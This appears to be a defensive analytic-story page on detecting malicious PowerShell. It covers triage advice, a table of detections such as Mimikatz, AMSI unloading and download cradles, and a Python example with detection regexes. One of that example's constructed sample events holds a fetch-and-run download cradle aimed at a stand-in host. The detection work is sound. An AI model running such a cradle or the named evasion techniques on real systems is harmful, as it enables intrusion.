Analytics Story: Malicious PowerShell

Description

Attackers are finding stealthy ways to "live off the land," leveraging utilities and tools that come standard on the endpoint--such as PowerShell--to achieve their goals without downloading binary files. These searches can help you detect and investigate PowerShell command-line options that may be indicative of malicious intent.

Why it matters

The searches in this Analytic Story monitor for parameters often used for malicious purposes. It is helpful to understand how often the notable events generated by this story occur, as well as the commonalities between some of these events. These factors may provide clues about whether this is a common occurrence of minimal concern or a rare event that may require more extensive investigation. Likewise, it is important to determine whether the issue is restricted to a single user/system or is broader in scope. The following factors may assist you in determining whether the event is malicious:

  1. Country of origin
  2. Responsible party
  3. Fully qualified domain names associated with the external IP address
  4. Registration of fully qualified domain names associated with the external IP address

Determining whether it is a dynamic domain frequently visited by others and/or how third parties categorize it can also help you answer some questions surrounding the attacker and details related to the external system. In addition, there are various sources--such as VirusTotal--that can provide some reputation information on the IP address or domain name, which can assist in determining whether the event is malicious. Finally, determining whether there are other events associated with the IP address may help connect data points or show other events that should be brought into scope.

Gathering data on the system of interest can sometimes help you quickly determine whether something suspicious is happening. Some of these items include finding out who else may have recently logged into the system, whether any unusual scheduled tasks exist, whether the system is communicating on suspicious ports, whether there are modifications to sensitive registry keys, and whether there are any known vulnerabilities on the system. This information can often highlight other activity commonly seen in attack scenarios or give more information about how the system may have been targeted.

Often, a simple inspection of the process name and path can tell you if the system has been compromised. For example, if svchost.exe is found running from a location other than C:\Windows\System32, it is likely something malicious designed to hide in plain sight from a cursory review of process names. Similarly, if the process itself seems legitimate but the parent process is running from the temporary browser cache, that could indicate activity initiated via a compromised website a user visited. It can also be very helpful to examine various behaviors of the process of interest or of its parent. For example, if it turns out the process of interest is malicious, it would be good to see if the parent of that process spawned other processes that might be worth further scrutiny. If a process is suspect, a review of the network connections made in and around the time of the event and/or whether the process spawned any child processes could be helpful as well. In the event a system is suspected of having been compromised via a malicious website, we suggest reviewing the browsing activity from that system around the time of the event. If categories are given for the URLs visited, that can help you zero in on possible malicious sites.

Most recently, we have added new content related to PowerShell Script Block Logging, Windows EventCode 4104. Script block logging presents the deobfuscated and raw script executed on an endpoint. The analytics produced were tested against commonly used attack frameworks: PowerShell-Empire, Cobalt Strike and Covenant. In addition, we sampled publicly available samples that utilize PowerShell and validated coverage. The analytics are here to identify suspicious usage, cmdlets, or script values. 4104 events are enabled via the Windows registry and may generate a large volume of data if enabled globally; enabling them on critical systems or a limited set of hosts may be best. During triage of 4104 events, review parallel processes and the commands executed, identify any file modifications and network communication, and review accordingly. Fortunately, the full script is available to determine the level of threat identified.
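As an added illustration (not part of this story or its own SPL searches), the Python below applies the kind of indicator checks the story's detections look for to constructed 4688 command lines and 4104 script blocks, decoding -EncodedCommand payloads on the way, which is exactly the deobfuscation step that 4104 script block logging gives you for free. The regexes, the event layout and the sample events are assumptions made for this example.

```python
import base64
import re

# Indicators mirroring detections in this story (regexes are assumptions,
# not the story's SPL): encoded command, hidden window, download cradle,
# execution-policy bypass, local account discovery.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "download_cradle": re.compile(r"(?i)\.download(?:string|file)\s*\("),
    "execution_policy_bypass": re.compile(
        r"(?i)(?:-ex(?:ecutionpolicy)?|Set-ExecutionPolicy)\s+(?:bypass|unrestricted)"),
    "local_account_discovery": re.compile(r"(?i)Get-LocalUser|Win32_UserAccount"),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the sorted indicator names found in one event.

    4688 / Sysmon 1 events carry only the command line, so an encoded payload
    is decoded and inspected too; 4104 events already carry the script text.
    """
    text = event["text"]
    found = set()
    decoded = decode_encoded_command(text) if event["id"] != 4104 else None
    if decoded is not None:
        found.add("encoded_command")
        text = text + "\n" + decoded
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            found.add(name)
    return sorted(found)


def _enc(script):
    # Build a -EncodedCommand argument the way powershell.exe expects it.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 4688, "text": "powershell.exe -NoP -W Hidden -Enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')")},
    {"id": 4104, "text": "Get-LocalUser | Select-Object Name, Enabled"},
    {"id": 4688, "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"id": 4104, "text": "Get-ChildItem C:\\Logs | Measure-Object"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], analyze_event(ev) or ["clean"])
```

A hit on an indicator is a triage starting point, not a verdict: the 4688 backup script above trips the execution-policy check and still needs the parent-process and network review described in the text.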

Detections

Name | Technique | Type
Suspicious Powershell Command-Line Arguments | PowerShell | TTP
Any Powershell DownloadFile | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP
Any Powershell DownloadString | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP
Detect Certify With PowerShell Script Block Logging | Steal or Forge Authentication Certificates, Command and Scripting Interpreter, PowerShell | TTP
Detect Empire with PowerShell Script Block Logging | Command and Scripting Interpreter, PowerShell | TTP
Detect Mimikatz With PowerShell Script Block Logging | OS Credential Dumping, PowerShell | TTP
GetLocalUser with PowerShell Script Block | Account Discovery, Local Account, PowerShell | Hunting
GetWmiObject User Account with PowerShell Script Block | Account Discovery, Local Account, PowerShell | Hunting
Malicious Powershell Executed As A Service | System Services, Service Execution | TTP
Malicious PowerShell Process - Encoded Command | Obfuscated Files or Information | Hunting
Malicious PowerShell Process With Obfuscation Techniques | Command and Scripting Interpreter, PowerShell | TTP
Possible Lateral Movement PowerShell Spawn | Remote Services, Distributed Component Object Model, Windows Remote Management, Windows Management Instrumentation, Scheduled Task, Windows Service, PowerShell, MMC | TTP
PowerShell 4104 Hunting | Command and Scripting Interpreter, PowerShell | Hunting
PowerShell - Connect To Internet With Hidden Window | PowerShell, Command and Scripting Interpreter | Hunting
Powershell COM Hijacking InprocServer32 Modification | Component Object Model Hijacking, Command and Scripting Interpreter, PowerShell | TTP
Powershell Creating Thread Mutex | Obfuscated Files or Information, Indicator Removal from Tools, PowerShell | TTP
PowerShell Domain Enumeration | Command and Scripting Interpreter, PowerShell | TTP
PowerShell Enable PowerShell Remoting | PowerShell, Command and Scripting Interpreter | Anomaly
Powershell Enable SMB1Protocol Feature | Obfuscated Files or Information, Indicator Removal from Tools | TTP
Powershell Execute COM Object | Component Object Model Hijacking, Event Triggered Execution, PowerShell | TTP
Powershell Fileless Process Injection via GetProcAddress | Command and Scripting Interpreter, Process Injection, PowerShell | TTP
Powershell Fileless Script Contains Base64 Encoded Content | Command and Scripting Interpreter, Obfuscated Files or Information, PowerShell | TTP
PowerShell Invoke CIMMethod CIMSession | Windows Management Instrumentation | Anomaly
PowerShell Loading DotNET into Memory via Reflection | Command and Scripting Interpreter, PowerShell | TTP
Powershell Processing Stream Of Data | Command and Scripting Interpreter, PowerShell | TTP
PowerShell Script Block With URL Chain | PowerShell, Ingress Tool Transfer | TTP
Powershell Using memory As Backing Store | PowerShell, Command and Scripting Interpreter | TTP
PowerShell WebRequest Using Memory Stream | PowerShell, Ingress Tool Transfer, Fileless Storage | TTP
Recon AVProduct Through Pwh or WMI | Gather Victim Host Information | TTP
Recon Using WMI Class | Gather Victim Host Information, PowerShell | Anomaly
ServicePrincipalNames Discovery with PowerShell | Kerberoasting | TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass | Command and Scripting Interpreter, PowerShell | TTP
Unloading AMSI via Reflection | Impair Defenses, PowerShell, Command and Scripting Interpreter | TTP
Windows Enable PowerShell Web Access | PowerShell | TTP
WMI Recon Running Process Or Services | Gather Victim Host Information | Anomaly

Data Sources

Name | Platform | Sourcetype | Source
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike
Powershell Script Block Logging 4104 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 12 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log System 7045 | Windows | xmlwineventlog | XmlWinEventLog:System

Source: GitHub | Version: 5